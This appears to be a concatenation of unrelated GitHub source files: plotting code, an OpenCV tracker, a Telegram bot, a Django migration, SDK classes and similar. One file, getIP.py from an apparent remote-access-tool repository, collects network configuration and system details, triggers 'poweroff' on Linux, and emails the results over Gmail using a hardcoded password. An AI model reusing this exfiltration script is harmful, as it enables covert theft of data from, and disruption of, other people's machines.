ax.set_xticklabels(ytick)
ax.set_yticklabels(xtick)
ax.set_xlabel('y (m)', fontsize = 13)
ax.set_ylabel('x (m)', fontsize = 13)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
for i in range(len(xtick)):
for j in range(len(ytick)):
text = ax.text(j, i, overall_optstiff[i][j],
ha="center", va="center", color="black")
ax.set_title("Stiffness of optimized posture(" + axisname+ " axis)", fontsize = 16)
fig.tight_layout()
plt.show()
fig, ax = plt.subplots()
im = ax.imshow(overal_change, vmin=-100, vmax=500, cmap = 'autumn_r')
cbar = ax.figure.colorbar(im, ax=ax)
cbarlabel = "ratio of changed stiffness"
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom", fontsize = 12)
# We want to show all ticks...
ax.set_xticks(np.arange(len(ytick)))
ax.set_yticks(np.arange(len(xtick)))
# ... and label them with the respective list entries
ax.set_xticklabels(ytick)
ax.set_yticklabels(xtick)
ax.set_xlabel('y (m)', fontsize = 13)
ax.set_ylabel('x (m)', fontsize = 13)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
for i in range(len(xtick)):
for j in range(len(ytick)):
if overal_change[i][j] < 0:
text = ax.text(j, i, overal_change_str[i][j],
ha="center", va="center", color="Red", fontweight="bold")
else:
text = ax.text(j, i, overal_change_str[i][j],
ha="center", va="center", color="black")
ax.set_title("Ratio of changed stiffness(" + axisname+ " axis)", fontsize = 16)
fig.tight_layout()
plt.show()
if __name__ == "__main__":
filename = ["../data/x_stiffness_compare.xlsx", "../data/y_stiffness_compare.xlsx", "../data/z_stiffness_compare.xlsx"]
axisname = ["x", "y", "z"]
for i in range(3):
heatmap_read(filename[i], axisname[i])
|
[
"nswve@naver.com"
] |
nswve@naver.com
|
a01543ef0594a423e1f294ceca5a43fbd4ac689d
|
cf86197a7ee935514e58a0b1b064c9a0eba70c6d
|
/allu_pandas/__init__.py
|
ae47be0f466f4033bb94be1b37714c00663e20d2
|
[] |
no_license
|
skojaku/pandas-alluvial-diagram
|
ad73f7b473818aa43a48625e4dcd2ed26290f9b7
|
ab097a47b3904daaa938594982b0f638206b4279
|
refs/heads/main
| 2022-12-27T15:33:14.019571
| 2020-10-12T12:12:25
| 2020-10-12T12:12:25
| 302,910,261
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 73
|
py
|
__author__ = "Sadamori Kojaku"
from .utils import *
from .draw import *
|
[
"skojaku@iu.edu"
] |
skojaku@iu.edu
|
f6790ee837fdef6d4e761df0c30e06570b37f4f8
|
85385b6a88d9d23218be3fea576ea245b6c8cdad
|
/02.object_tracking.py
|
8e275ee534ba3b26f0f248dd7746ce10efc19fbb
|
[] |
no_license
|
agiledots/opencv-tracking
|
ded8191144287be94b1c8a1076788baa39662ab5
|
797e921b787e1d48ad6185232eb685c4b8e3d8d5
|
refs/heads/master
| 2020-03-19T03:06:16.067120
| 2018-06-01T09:10:59
| 2018-06-01T09:10:59
| 135,695,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,513
|
py
|
import cv2
import sys
# https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
def create_tracker():
# Set up tracker.
# Instead of MIL, you can also use
tracker_types = ['BOOSTING', 'MIL', 'KCF', 'TLD', 'MEDIANFLOW', 'GOTURN']
tracker_type = tracker_types[2]
if int(minor_ver) < 3:
tracker = cv2.Tracker_create(tracker_type)
else:
if tracker_type == 'BOOSTING':
tracker = cv2.TrackerBoosting_create()
if tracker_type == 'MIL':
tracker = cv2.TrackerMIL_create()
if tracker_type == 'KCF':
tracker = cv2.TrackerKCF_create()
if tracker_type == 'TLD':
tracker = cv2.TrackerTLD_create()
if tracker_type == 'MEDIANFLOW':
tracker = cv2.TrackerMedianFlow_create()
if tracker_type == 'GOTURN':
tracker = cv2.TrackerGOTURN_create()
return (tracker, tracker_type)
if __name__ == '__main__':
# Read video
video = cv2.VideoCapture("./videos/In Pursuit Of The Giant Bluefin.mp4")
# Exit if video not opened.
if not video.isOpened():
print("Could not open video")
sys.exit()
# Read first frame.
ok, frame = video.read()
if not ok:
print('Cannot read video file')
sys.exit()
# play video
while(True):
ok, frame = video.read()
if not ok:
print("can read video")
break
# Display result
cv2.imshow("Tracking", frame)
if cv2.waitKey(1) & 0xFF == ord('r'):
break
# Define an initial bounding box
bbox = (287, 23, 86, 320)
# Uncomment the line below to select a different bounding box
bbox = cv2.selectROI(frame, True)
# create tracker
tracker, tracker_type = create_tracker()
# Initialize tracker with first frame and bounding box
ok = tracker.init(frame, bbox)
while True:
# Read a new frame
ok, frame = video.read()
if not ok:
break
# Start timer
timer = cv2.getTickCount()
# Update tracker
ok, bbox = tracker.update(frame)
# Calculate Frames per second (FPS)
fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer);
# restart
if cv2.waitKey(1) & 0xFF == ord('r'):
# create tracker
tracker, tracker_type = create_tracker()
bbox = cv2.selectROI(frame, True)
# Initialize tracker with first frame and bounding box
ok = tracker.init(frame, bbox)
# Draw bounding box
if ok:
# Tracking success
p1 = (int(bbox[0]), int(bbox[1]))
p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))
cv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)
else:
# Tracking failure
cv2.putText(frame, "Tracking failure detected", (100, 80), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 255), 2)
# Display tracker type on frame
cv2.putText(frame, tracker_type + " Tracker", (100, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2);
# Display FPS on frame
cv2.putText(frame, "FPS : " + str(int(fps)), (100, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2);
# Display result
cv2.imshow("Tracking", frame)
# Exit if ESC pressed
k = cv2.waitKey(1) & 0xff
if k == 27:
break
|
[
""
] | |
c6371681f05968aa9861b727a0d93db16af46a07
|
994cbc9972385b02f5ad7528ab1bc62363a92cb8
|
/getIP.py
|
12e511eaca5112b72f15b17ea1235018da16c157
|
[] |
no_license
|
Chetanck26/websocket_rat
|
8dde52c66b86105cebd618238073b6c469b12217
|
a607c1a5e7a74170c2c56682f1af08ef9c7ab53f
|
refs/heads/master
| 2020-03-28T02:26:01.931648
| 2018-09-05T14:14:06
| 2018-09-05T14:14:06
| 147,570,000
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 893
|
py
|
import smtplib
import platform
server = smtplib.SMTP('smtp.gmail.com', 587)
server.login("cvdrat@gmail.com", "rat123rat123")
if platform.system().lower() == 'windows':
cmd = subprocess.Popen("ipconfig",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
if platform.system().lower() == 'linux':
cmd = subprocess.Popen("poweroff",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
cmd = subprocess.Popen("ifconfig",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
standardOutput = str(cmd.stdout.read(),"utf-8")
standardError = str(cmd.stderr.read(),"utf-8")
response = {"status":"OK","stdout":standardOutput,"stderr":standardError,"dir":str(os.getcwd()),"systemInfo":platform.platform()}
response = json.dumps(response)
server.sendmail("cvdrat@gmail.com", "hybridx18@gmail.com",response)
|
[
"chetan.k2626@gmail.com"
] |
chetan.k2626@gmail.com
|
33023065e0c2369fa3b6b3d94be20ca5db568b38
|
b48d274e38f0246e59a7f104ff6ca6a3e0f335b8
|
/main.py
|
4205712eaa2e1165433caa91395ebf7e93a2a98c
|
[] |
no_license
|
legacy72/bulling_controller_telegram_bot
|
6f412c1c84d430ac5b5bd72cd382b573be2c4c33
|
5f8eb776c9d7d5ac0087f50aa29ac505bcc9d235
|
refs/heads/master
| 2023-02-01T21:20:42.889336
| 2020-12-07T14:52:16
| 2020-12-07T14:52:16
| 319,351,377
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,243
|
py
|
import logging
import telebot
from utils import get_info_about_bullying, get_arg
from settings import TELEGRAM_TOKEN
logger = telebot.logger
telebot.logger.setLevel(logging.INFO)
bot = telebot.TeleBot(TELEGRAM_TOKEN)
PERCENTAGE_BULLYING = 80
commands = {
'help': 'Помощь по боту',
'set_quality_percentage': 'Установить с какой вероятностью считать, что текст буллинговый (по умолчанию 80%)',
'show_quality_percentage': 'Посмотреть при какой вероятности считать, что текст буллинговый',
}
@bot.message_handler(commands=['start', 'help'])
def start_and_help_handler(message):
cid = message.chat.id
help_text = 'Список команд: \n'
for key in commands:
help_text += f'/{key} : '
help_text += f'{commands[key]}\n'
bot.send_message(cid, help_text)
@bot.message_handler(commands=['set_quality_percentage'])
def set_quality_percentage(message):
try:
percentage = get_arg(message.text)
global PERCENTAGE_BULLYING
PERCENTAGE_BULLYING = percentage
bot.reply_to(
message, f'Теперь сообщение будет считаться буллинговым при вероятности выше {PERCENTAGE_BULLYING}%'
)
except ValueError:
bot.reply_to(message, 'Укажите через пробел число от 1 до 99')
@bot.message_handler(commands=['show_quality_percentage'])
def show_quality_percentage(message):
bot.reply_to(
message, f'Сообщения будут считаться буллинговым при вероятности выше {PERCENTAGE_BULLYING}%'
)
@bot.message_handler(func=lambda message: True)
def check_bullers_handler(message):
bulling_percentage, bad_words = get_info_about_bullying(message.text)
if bulling_percentage > PERCENTAGE_BULLYING:
bot.reply_to(
message,
f'Ты кибербуллер! Буллишь на {bulling_percentage}%. '
f'В буллинговых текстах часто встречаются слова:\n{bad_words}'
)
bot.polling()
|
[
"sky45leg72"
] |
sky45leg72
|
22eacd6ecd3ea15128a98f216c4569f2222a8a52
|
bfbe8a27ce6f46a7f2d03731b1de1e80cc6056c9
|
/projects/inflearn/python_algorithm/dfs_bfs/사과나무.py
|
63265e21d4cdac9e7df703e7acc8f48746934524
|
[] |
no_license
|
paige0701/algorithms-and-more
|
95175a18fd9d4a41659c50e3c5e314fe2bb23b8b
|
763a4009f8fa87c24552b5e77375c72896672b58
|
refs/heads/master
| 2021-06-11T04:19:29.559758
| 2021-04-07T11:29:01
| 2021-04-07T11:29:01
| 184,376,577
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 880
|
py
|
def BFS(n , a):
dx = [-1, 0, 1, 0]
dy = [0, 1, 0, -1]
ch = [[0] * n for _ in range(n)]
sum = 0
from collections import deque
dq = deque()
ch[n//2][n//2] = 1
sum += a[n//2][n//2]
dq.append((n//2, n//2))
L = 0
while True:
if L == n//2:
break
size = len(dq)
for i in range(size):
tmp = dq.popleft()
for j in range(4):
x = tmp[0] + dx[j]
y = tmp[1] + dy[j]
if ch[x][y] == 0:
sum += a[x][y]
ch[x][y] = 1
dq.append((x, y))
L += 1
print(sum)
if __name__ == '__main__':
n = 5
a = [[10, 13, 10, 12, 15],
[12, 39, 30, 23, 11],
[11, 25, 50, 53, 15],
[19, 27, 29, 37, 27],
[19, 13, 30, 13, 19]
]
BFS(n, a)
|
[
"paigechoi0701@gmail.com"
] |
paigechoi0701@gmail.com
|
96e10e68064bc88b467883df35e36bbdb7fe6913
|
8fdab174252614c3d0eea09a4bd7aa262c087fd1
|
/python/Zetcode/SQLite Python Tutorial/metadata2.py
|
6ce7d488aaa21cea576206da7ea53fc0999cd394
|
[] |
no_license
|
idreesdb/Tutorials
|
a5190c72ad9ad25d9e8302c01357939bd62b75d8
|
754cd20250b7f826caf76a1d3c188826a4babbd3
|
refs/heads/master
| 2021-01-17T07:37:01.623156
| 2016-05-27T14:03:28
| 2016-05-27T14:03:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 420
|
py
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
import sqlite3
import sys
with sqlite3.connect('test.db') as con:
cur = con.cursor()
cur.execute('SELECT * FROM Cars')
col_names = [cn[0] for cn in cur.description]
rows = cur.fetchall()
print '{0} {1:<10} {2}'.format(col_names[0], col_names[1], col_names[2])
for row in rows:
print '{0:>2} {1:<10} {2}'.format(row[0], row[1], row[2])
|
[
"slxecas@gmail.com"
] |
slxecas@gmail.com
|
e3242e5b6f4f0a7f6b70c491d8fe59b69863e0a5
|
4e53e35d585302ee112dcba151d6d618664a1d66
|
/appenv/contacts/migrations/0001_initial.py
|
d36b65510630148a5ea82867b680a4d63efe2a3d
|
[] |
no_license
|
Samra78/DjangoApp
|
af2bcd150bbd606ea5ee2bd79be6609131ef6503
|
29875c88c9a4462a1c02930c69bba1d562d4b6e7
|
refs/heads/main
| 2023-05-06T02:16:13.987741
| 2021-05-26T17:09:28
| 2021-05-26T17:09:28
| 370,963,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 739
|
py
|
# Generated by Django 3.2.3 on 2021-05-26 06:54
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40)),
('address', models.CharField(max_length=100)),
('phone', models.CharField(max_length=50)),
('email', models.CharField(max_length=60)),
('contact_type', models.CharField(max_length=20)),
],
),
]
|
[
"samrakkamal@gmail.com"
] |
samrakkamal@gmail.com
|
37a95443478590c3cbdfe96c13b7ad5986f5020e
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayCommerceTransportParkingGoodsCreateResponse.py
|
b2c2b21d034b4e3cc1f3f0ba3b1ab70a31f0f35f
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,002
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceTransportParkingGoodsCreateResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceTransportParkingGoodsCreateResponse, self).__init__()
self._goods_id = None
self._out_id = None
@property
def goods_id(self):
return self._goods_id
@goods_id.setter
def goods_id(self, value):
self._goods_id = value
@property
def out_id(self):
return self._out_id
@out_id.setter
def out_id(self, value):
self._out_id = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceTransportParkingGoodsCreateResponse, self).parse_response_content(response_content)
if 'goods_id' in response:
self.goods_id = response['goods_id']
if 'out_id' in response:
self.out_id = response['out_id']
|
[
"jiandong.jd@antfin.com"
] |
jiandong.jd@antfin.com
|
6e03e8986c8577684ada604fb5f240598e0c42bf
|
5b6630541711827376267f825cc0c2d497e1cf4c
|
/tests/test_python.py
|
04087e65a4d9e15d91a619889df979be7d7331c4
|
[] |
no_license
|
odoucet/cig-springchallenge2020
|
4b41344e06f148423c0bdfc68d20b64039e83511
|
e39e54f1cca49ec559b78a930cb0897f2ebc7ee7
|
refs/heads/master
| 2023-07-26T09:00:20.874774
| 2020-05-14T17:41:16
| 2020-05-14T17:41:16
| 262,107,360
| 1
| 0
| null | 2023-07-06T21:36:24
| 2020-05-07T16:51:06
|
Python
|
UTF-8
|
Python
| false
| false
| 153
|
py
|
import numpy
def test_python():
tmpcarte = numpy.full( (6, 6), numpy.nan )
#tmpcarte.fill(numpy.nan)
assert numpy.isnan(tmpcarte[0][5])
|
[
"olivier@oxeva.fr"
] |
olivier@oxeva.fr
|
5c2a507b7cfa64077e5854eee400a8dca631e971
|
acda8294b7b670668f25e445ab2233b2c6b214d1
|
/external_scripts/create_references_csv/create_references_csv.py
|
8865e1669a14b8b1a330d1db4883167131a6f5e5
|
[
"MIT"
] |
permissive
|
leoisl/pandora_paper_roc
|
6cb76cfe84d832de6c3d3525947fe8af712637df
|
bb21c76faefa8021c86c3be9d77b8b5999fe2ef5
|
refs/heads/master
| 2023-06-22T18:18:34.951817
| 2021-06-21T19:22:08
| 2021-06-21T19:22:08
| 310,068,005
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,238
|
py
|
# configs
references_folder = "references_subset"
suffix = ".fna.gz"
from pathlib import Path
from glob import glob
import subprocess
import pandas as pd
def run_command(command):
subprocess.check_call(command, shell=True)
def get_reference_id(uncompressed_file):
with open(uncompressed_file) as uncompressed_filehandler:
line = uncompressed_filehandler.readline()
reference_id = line.split()[0][1:]
return reference_id
def main():
reference_ids = []
compressed_files = []
uncompressed_files = []
for file in glob(f"{references_folder}/*{suffix}"):
compressed_file = Path(file).absolute()
uncompressed_file = compressed_file.with_suffix("")
run_command(f"gunzip -c {compressed_file} > {uncompressed_file}")
reference_id = get_reference_id(uncompressed_file)
reference_ids.append(reference_id)
compressed_files.append(compressed_file)
uncompressed_files.append(uncompressed_file)
df = pd.DataFrame(data={"reference_id": reference_ids,
"compressed_file": compressed_files,
"uncompressed_file": uncompressed_files})
df.to_csv("references.csv", index=False)
main()
|
[
"leandro@ebi.ac.uk"
] |
leandro@ebi.ac.uk
|
804dc216d8efb2d65ef85ee2e7305dc58c150f65
|
193e69d4ad303949d8facf1cd7aaef2f1452b6da
|
/memory_tests/results/memops_scalability/plot_csv.py
|
d92d73a91a51e6656ebe4ce5bf753b354cd9a6e5
|
[] |
no_license
|
anastop/archbench
|
804bf53aeeaa34099f125418f169302a7e428bcb
|
7663f0a56e3abe728ea696e2b1be45a17910d16b
|
refs/heads/master
| 2020-12-24T13:28:07.315391
| 2020-12-18T14:22:08
| 2020-12-18T14:22:08
| 33,410,156
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,285
|
py
|
#!/usr/bin/env python
import sys
import matplotlib
#matplotlib.use('PDF')
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import mlab
from util import *
infile = sys.argv[1]
f1 = open(infile, 'r')
csvfile = infile + '.csv'
f2 = open(csvfile, 'w')
maxthreads = 0
linearray = []
ops = []
for line in f1.readlines():
if 'nthreads:' in line:
linearray.append(line.strip())
maxthreads=max(maxthreads,int(get_val(line,'nthreads:')))
cur_op = get_val(line,'op:')
if cur_op not in ops:
ops.append(cur_op)
#print header
f2.write('nthreads ' + ' '.join(ops) + " \n")
#print column values
for thread in range(1, maxthreads+1):
f2.write(str(thread) + " ")
for op in ops:
for line in linearray:
if ('nthreads:' + str(thread) + ' ') in line and ('op:' + op + ' ') in line:
f2.write(get_val(line,'cycles:') + ' ')
f2.write('\n')
f2.close()
#########################################################################
a = mlab.csv2rec(csvfile, delimiter=' ')
## SHORT version
selected_cols = (
#'rd_priv_1var',
#'rd_priv_1var_misal',
#'rd_priv_fit_l1',
#'rd_priv_nofit_llc',
'rd_shrd_1var',
#'rd_shrd_1var_misal',
#'rd_shrd_fit_l1',
#'rd_shrd_nofit_llc',
#'wr_priv_1var',
#'wr_priv_1var_misal',
#'wr_priv_fit_l1',
#'wr_priv_nofit_llc',
'wr_shrd_1var',
#'wr_shrd_1var_misal',
#'wr_shrd_fit_l1',
#'wr_shrd_nofit_llc',
#'rmw_priv_1var',
#'rmw_priv_1var_misal',
#'rmw_priv_fit_l1',
#'rmw_priv_nofit_llc',
'rmw_shrd_1var',
#'rmw_shrd_1var_misal',
#'rmw_shrd_fit_l1',
#'rmw_shrd_nofit_llc',
#'atomic_rmw_priv_1var',
#'atomic_rmw_priv_1var_misal',
#'atomic_rmw_priv_fit_l1',
#'atomic_rmw_priv_nofit_llc',
#'atomic_rmw_shrd_1var',
#'atomic_rmw_shrd_1var_misal',
#'atomic_rmw_shrd_fit_l1',
#'atomic_rmw_shrd_nofit_llc',
#'mfence_reg',
#'mfence_wrmem',
#'mfence_rmwmem_1var',
#'mfence_rmwmem_nofit_llc',
#'mfence_lockadd_reg',
#'mfence_lockadd_wrmem',
#'mfence_lockadd_rmwmem_1var',
#'mfence_lockadd_rmwmem_nofit_llc',
)
curves = []
for col in selected_cols:
c = plt.plot(a.nthreads, a[col], 'o-', linewidth=2)
curves.append(c)
plt.legend( curves, map(str.upper, selected_cols), loc='best' )
## VERBOSE version
"""
l = plt.plot(
a.nthreads, a.wr_priv_1var,'o-',
a.nthreads, a.wr_priv_1var_misal,'o-',
a.nthreads, a.wr_priv_fit_l1,'o-',
a.nthreads, a.wr_priv_nofit_llc,'o-',
a.nthreads, a.wr_shrd_1var,'o-',
a.nthreads, a.wr_shrd_1var_misal,'o-',
a.nthreads, a.wr_shrd_fit_l1,'o-',
a.nthreads, a.wr_shrd_nofit_llc,'o-',
linewidth=2)
plt.legend( l,
(
'WR-PRIV-1VAR',
'WR-PRIV-1VAR-MISAL',
'WR-PRIV-FIT-L1',
'WR-PRIV-NOFIT-LLC',
'WR-SHRD-1VAR',
'WR-SHRD-1VAR-MISAL',
'WR-SHRD-FIT-L1',
'WR-SHRD-NOFIT-LLC',
),
loc='best'
)
"""
leg = plt.gca().get_legend()
ltext = leg.get_texts()
llines = leg.get_lines()
plt.setp(ltext, fontsize='small')
plt.setp(llines, linewidth=2)
r = plt.axis()
plt.axis([0.5, maxthreads+0.5, 0, r[3]])
#plt.grid(True)
plt.ylabel('Avg. cycles per operation')
plt.xlabel('#Threads')
#plt.title('Performance')
plt.show()
#plt.savefig('myfig.pdf')
|
[
"n.anastop@gmail.com"
] |
n.anastop@gmail.com
|
da87e2b3975340596bb10584cb4a3569e4aabcc6
|
5ede9a684485630ec925088d19618be1cbc5ff08
|
/src/simulation.py
|
467eb39337bba1ac76b6b4aeb2d242545d8e3fd9
|
[] |
no_license
|
mgoldenb/EvacuationPolicies
|
af2e56c7df5e5faadfb1058299d22feecaef2ef9
|
e511236c6c98e84aafdf91fa7224e8eaf6fefbd4
|
refs/heads/master
| 2020-04-27T15:15:53.173068
| 2014-02-09T17:23:52
| 2014-02-09T17:23:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,712
|
py
|
from common import *
class Simulation:
def __init__(self, instance, timeThreshold):
self.instance = instance
self.agents = agents = instance.agents
self.policies = policies = instance.policies
self.timeThreshold = timeThreshold
self.paths = paths = [[agent] for agent in agents]
self.colors = colors = [[policy.color] for policy in policies]
self.directions = [[] for agent in agents]
for time in range(1, timeThreshold + 1):
self.resolutionDecisions = {}
self.processConflicts(time)
policyChanged = False
for i in range(len(agents)):
self.directions[i].append(self._wants[i])
if not self._successFlags[i]:
if (policies[i].negativeFeedback(changeAllowedFlag = True)):
policyChanged = True
if policyChanged:
self.processConflicts(time)
for i in range(len(agents)):
colors[i].append(policies[i].color)
if self._successFlags[i]:
paths[i].append(self._wants[i])
policies[i].positiveFeedback()
else:
paths[i].append(self._curs[i])
policies[i].negativeFeedback(changeAllowedFlag = False)
self.nSaved = sum((1 if path[-1] in instance.exits else 0) for path in paths)
if self.nSaved == instance.nAgents:
self.timeThreshold = time
break
def processConflicts(self, time):
self._successFlags = successFlags = [True] * len(self.agents)
self._curs = [self.paths[i][time-1] for i in range(len(self.agents))]
self._wants = [self.policies[i].next() for i in range(len(self.agents))]
self.processTypedConflicts(time, "Collision")
while True:
nConflicts = self.processTypedConflicts(time, "IntoWaiting")
if nConflicts == 0: break
def processTypedConflicts(self, time, type):
nConflicts = 0
successFlags = self._successFlags
agents = self.agents;
for i in range(len(agents)):
i_cur = self._curs[i]
i_wants = (self._wants[i] if successFlags[i] else i_cur)
if i_wants in self.instance.exits: continue
for j in range(0,i):
j_cur = self._curs[j]
j_wants = (self._wants[j] if successFlags[j] else j_cur)
if j_wants in self.instance.exits: continue
if i_wants == j_wants:
nConflicts += 1
if type == "Collision":
if i_cur == i_wants or j_cur == j_wants: continue
try:
winner = self.resolutionDecisions[(i,j)]
except:
winner = (i if random.randint(False, True) else j)
self.resolutionDecisions[(i,j)] = self.resolutionDecisions[(j,i)] = winner
if winner == j:
successFlags[i] = False
break
else:
successFlags[j] = False
continue
if type == "IntoWaiting":
if j_cur == j_wants:
successFlags[i] = False
break
if i_cur == i_wants:
successFlags[j] = False
break
return nConflicts
|
[
"mgoldenbe@gmail.com"
] |
mgoldenbe@gmail.com
|
52e020ec81c3b576b9d59261084f29054930abca
|
527ecc95854a8448969b7ec9587730760008d49e
|
/Code/DialogueEvaluation/No_Ctxt_No_Gold_Merge/no_gold_config.py
|
de8614e9cc33276f353e155b9f180c063413f82c
|
[] |
no_license
|
SourKream/DERP
|
1b4cd49332a13a9b08e32cef06869add4383c776
|
874e6f77dff1266290b090055a41d03e7ac6a0b4
|
refs/heads/master
| 2021-03-16T06:13:49.469159
| 2017-08-21T16:56:19
| 2017-08-21T16:56:19
| 81,952,482
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,483
|
py
|
# model params
CTXT_GRU_HIDDEN_STATE = 512
RESP_GRU_HIDDEN_STATE = 300
VOCAB_SIZE = 50000 # 1 for UNK
MAX_RESP_LEN = 50
MAX_CTX_LEN = 500
EMBEDDING_DIM = 300
DENSE_HIDDEN_STATE = 100
DROPOUT = 0.3
use_attention = True
# training details
TRAIN_SIZE = -1 # -1 => train on all
BATCH_SIZE = 256
TRAINABLE = True
# hpc file paths
train_file = '/scratch/cse/dual/cs5130275/DERP/Reddit/DatasetNewPruned11M/train.txt'
val_file = '/scratch/cse/dual/cs5130275/DERP/Reddit/DatasetNewPruned11M/val.txt'
test_file = '/scratch/cse/dual/cs5130275/DERP/Reddit/DatasetNewPruned11M/test.txt'
count_vect_vocab_file = '/home/cse/dual/cs5130275/DERP/Code/Models/LogisticRegBaseline/vocab_50k'
save_model_path = '/scratch/cse/dual/cs5130275/DERP/Models/GRU_Ctxt_GRU_Resp_NoGold/' + 'CTXT_HIDDEN_STATE_' + str(CTXT_GRU_HIDDEN_STATE) + '_RESP_HIDDEN_STATE_' + str(RESP_GRU_HIDDEN_STATE) + '_VOCAB_SIZE_' + str(VOCAB_SIZE) + '_MAX_RESP_LEN_' + str(MAX_RESP_LEN) + '_EMBEDDING_DIM_' + str(EMBEDDING_DIM) + '_DENSE_HIDDEN_STATE_' + str(DENSE_HIDDEN_STATE) + '_DROPOUT_' + str(DROPOUT) + '_BATCH_SIZE_' + str(BATCH_SIZE) + '_attn'
# load_model_path = ''
load_model_path = '/scratch/cse/dual/cs5130275/DERP/Models/GRU_Ctxt_GRU_Resp_NoGold/CTXT_HIDDEN_STATE_512_RESP_HIDDEN_STATE_300_VOCAB_SIZE_50000_MAX_RESP_LEN_50_EMBEDDING_DIM_300_DENSE_HIDDEN_STATE_100_DROPOUT_0.3_BATCH_SIZE_256_attn_on_epoch_59.weights'
save_pred_path = '/home/cse/dual/cs5130275/DERP/Code/Models/GRU_Ctxt_GRU_Resp_NoGold/attn500'
|
[
"akshay.akgupta@gmail.com"
] |
akshay.akgupta@gmail.com
|
770cde652a542daab0f2fd55ae29d6854a5d0c70
|
782d5ae9fad0ff98518afca1ef1eee97574f3a9e
|
/getbizy_project/getbizy_project/getbizy_project/urls.py
|
e8693ee49a367a147e7b5c2df5853dbc95dd49d2
|
[
"MIT"
] |
permissive
|
bbrock25/getbizy
|
6eeb4406cbe225dc4b83a0f6ab0715c3ab6b7717
|
4889cd1e4199023e8fa2b2b3afb35239cfd27ca0
|
refs/heads/master
| 2020-12-25T17:26:38.103584
| 2014-06-01T21:33:31
| 2014-06-01T21:33:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.conf import settings
from django.views.generic import TemplateView
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
#url(r'^$', TemplateView.as_view(template_name='base.html')),
url(r'', include('social_auth.urls')),
url(r'^$', 'social.views.home', name='home'),
url(r'^my-profile/', 'social.views.my_profile', name='my-profile'),
url(r'^edit-profile/', 'social.views.edit_profile', name='edit-profile'),
url(r'^edit-account/', 'social.views.edit_account', name='edit-account'),
url(r'^view-user/', 'social.views.view_user', name='view-user'),
url(r'^logout/', 'social.views.logout', name='logout'),
url(r'^admin/', include(admin.site.urls)),
)
# Uncomment the next line to serve media files in dev.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
|
[
"bbrock@Bills-MacBook-Pro.local"
] |
bbrock@Bills-MacBook-Pro.local
|
2bac3e251e0b444b1519fc0bc91ee5f46aa5542b
|
e408837d2242f9ca17259e165566cbabc3ea6645
|
/MXNetChapter4/DenseNet.py
|
6535288288ba12b425354e6c31c0707f61c7bb5c
|
[] |
no_license
|
TriLoo/c_algorithm
|
f885aab15d9fd728e023e527fa0d1cf12a4ce284
|
5fe60b830b352a2fa5a78c4517ae20cb16d36557
|
refs/heads/master
| 2021-01-13T08:43:01.153175
| 2020-11-15T13:43:24
| 2020-11-15T13:43:24
| 82,043,035
| 5
| 1
| null | 2017-02-20T11:13:06
| 2017-02-15T09:26:42
| null |
UTF-8
|
Python
| false
| false
| 2,459
|
py
|
from mxnet import gluon
from mxnet import nd
from mxnet.gluon import nn
import utils
from mxnet import init
import mxnet as mx
def conv_block(channels):
out = nn.Sequential()
out.add(
nn.BatchNorm(),
nn.Activation('relu'),
nn.Conv2D(channels, kernel_size=3, padding=1)
)
return out
class DenseBlock(nn.Block):
def __init__(self, layers, growth_rate, **kwargs):
super(DenseBlock, self).__init__(**kwargs)
self.net = nn.Sequential()
for i in range(layers):
